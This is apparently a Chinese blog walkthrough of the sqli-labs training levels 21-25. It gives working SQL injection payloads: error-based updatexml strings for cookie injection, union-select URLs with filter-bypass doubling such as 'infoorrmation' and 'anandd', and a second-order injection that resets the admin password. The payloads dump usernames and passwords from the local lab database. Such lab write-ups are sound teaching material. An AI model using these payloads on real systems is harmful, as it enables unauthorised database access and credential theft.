首页 > 数据库 >sqlilabs less21-25关手工注入

sqlilabs less21-25关手工注入

时间:2024-08-22 21:55:33浏览次数:17  
标签:27% 25 group name less21 schema id concat sqlilabs

第21关

一.登录页面

二 .Burp Suite 抓包,进入重放器

三.查询数据库 先进行编码

')and updatexml(1,concat(1,database()),1)#

四.查表,先进行编码

')and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)

 

五.查列,先进行编码

')and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #

 六.查询users表中所有数据

')and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#

第22关

一.登录页面

二 .Burp Suite 抓包,进入重放器

三.查询数据库 先进行编码

"and updatexml(1,concat(1,database()),1)#

四.查表,先进行编码

"and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#

五.查列,先进行编码

"and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #

六.查询users表中所有数据

"and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#

第23关

一.看有无回显点

二查询数据库

http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,database(),3%20or%20%271%27=%271icon-default.png?t=N7T8http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,database(),3%20or%20%271%27=%271

三.查表

http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20or%20%271%27=%271icon-default.png?t=N7T8http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20or%20%271%27=%271

四.查列

http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20or%20%271%27=%271icon-default.png?t=N7T8http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20or%20%271%27=%271

第24关

使用二次注入

一.注册用户

 二.admin的密码被修改为777777

第25关

一.闭合方式为 单引号 '

http://127.0.0.1/Less-25/?id=1%27%20--+icon-default.png?t=N7T8http://127.0.0.1/Less-25/?id=1%27%20--+

二.查询数据库

http://127.0.0.1/Less-25/?id=0%27%20union%20select%201,database(),user()%20--+icon-default.png?t=N7T8http://127.0.0.1/Less-25/?id=0%27%20union%20select%201,database(),user()%20--+

三. 查询库中所有表

http://127.0.0.1/Less-25/?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20infoorrmation_schema.tables%20where%20table_schema=%27security%27--+icon-default.png?t=N7T8http://127.0.0.1/Less-25/?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20infoorrmation_schema.tables%20where%20table_schema=%27security%27--+

四.查询列

http://127.0.0.1/Less-25/?id=-1%27union%20select%201,group_concat(column_name),3%20from%20infoorrmation_schema.columns%20where%20table_schema=%27security%27%20anandd%20table_name=%27users%27--+icon-default.png?t=N7T8http://127.0.0.1/Less-25/?id=-1%27union%20select%201,group_concat(column_name),3%20from%20infoorrmation_schema.columns%20where%20table_schema=%27security%27%20anandd%20table_name=%27users%27--+

标签:27%,25,group,name,less21,schema,id,concat,sqlilabs
From: https://blog.csdn.net/m0_75036923/article/details/141434570

相关文章

  • C++—八股文总结(25秋招期间一直更新)
    1、const1.1指针常量和常量指针说说constint*a,intconst*a,constinta,int*consta,constint*consta分别是什么,有什么特点。constint*a==intconst*a; //可以通过a访问整数值,但不能通过a修改该整数的值,指针本身是可变的,可以指向不同的整数constint......
  • PCIe学习笔记(25)
    数据完整性PCIExpress的基本数据可靠性机制包含在数据链路层(dataLinkLayer)中,它使用32位的LCRC(CRC)码逐链路检测TLP中的错误,并采用逐链路重传机制进行错误恢复。TLP是一个数据和事务控制单元,由位于PCIExpress域“边缘”的数据源(如Endpoint或RootComplex)创建,可能通过......
  • sqli-labs靶场通关攻略 21-25
    主页有sqli-labs靶场通关攻略1-20第二一关less-21步骤一:输入Username:adminPassword:admin利用Burpsutie进行抓包步骤二:在Cookie后输入'报错,判断闭合方式为')#对所写代码进行如下操作:选中右击->Convertselection->Base64->Base64-encode步骤三:判断列数')order......
  • ASP: Response 对象 错误 'ASP 0251 : 80004005' 解决办法
    ASP:Response对象错误'ASP0251:80004005'解决办法 Response对象错误'ASP0251:80004005'超过响应缓冲区限制 这种情况一般是因为需要输出的网页内容太大了,由于asp在输入内容到客户的浏览器上之前,会把需要输出的全部内容先输出到缓存区,这个缓存区一般默认大小......
  • 基于SpringBoot+Vue的学生作业管理系统的详细设计和实现(25年最新,附源码+论文+部署讲
    文章目录1.前言2.系统演示录像3.论文参考4.代码运行展示图5.技术框架5.1SpringBoot技术介绍5.2Vue技术介绍6.可行性分析7.系统测试7.1系统测试的目的7.2系统功能测试8.数据库表设计9.代码参考10.数据库脚本11.找我做程序,有什么保障?12.联系我们1.前......
  • 【2025考研英语高分写作:20大必备范文】经典范文053 社会热点:健康 P177
    Directions:Writeanessaybasedonthefollowingchart.Inyourwriting,youshould1)interpretthechart,and2)giveyourcomments.Youshouldwriteabout150wordsontheANSWERSHEET.        Thelinechartaboveillustratesclearlytheamoun......
  • 海光 FTPM 运行报错:Fapi_Provision_Finish() ErrorCode (0x00060025) No EK certifica
    使用的是海光CPU提供的基于固件的FTPM,错误原因是海光没有给TPM提供相应的EK证书。从而导致Fapi_Provision()接口无法通过证书的校验。关于Fapi_Provision()接口的功能,官网提到是:RetrievetheEKtemplate,nonceandcertificate,verifythattheymatchtheTPM’sEK......
  • 洛谷 P2590 [ZJOI2008] 树的统计 题解
    题目大意给你一个\(N\),然后再给你两个长度为\(N\)的序列。让你构造一个仅有\(0\)和\(1\)的\(N\timesN\)的正方形,但是要满足两个序列的顺序:第一个序列指的是该正方形每一行所构成的二进制数的大小顺序。第二个序列指的是该正方形每一列所构成的二进制数的大小顺序。......
  • 游卡,得物,三七互娱,顺丰(提前批),快手,oppo,埃科光电,康冠科技25届秋招内推
    游卡,得物,三七互娱,顺丰(提前批),快手,oppo,埃科光电,康冠科技25届秋招内推①游卡【岗位】程序技术类、产品策划类、美术类、发型运营类、职能综合类、桌游业务类【一键内推】https://sourl.cn/PHiZZE【内推码】DSymte2c ②得物【八大职类】技术类、供应链类、产品类、运营类、......
  • 2025年即将毕业的大学生们,要怎么选题才不会与人重复,与众不同呢?
    同学们!选题是你们毕业论文的重要一步,就像选择一份与众不同的工作一样,需要一些技巧和注意事项。让我慢慢告诉你们如何选题才能与众不同吧!首先,选择一个独特的话题。就像你们选择一份独一无二的工作一样,选择一个独特的话题可以让你的论文与众不同。你可以选择一个尚未被广泛研究......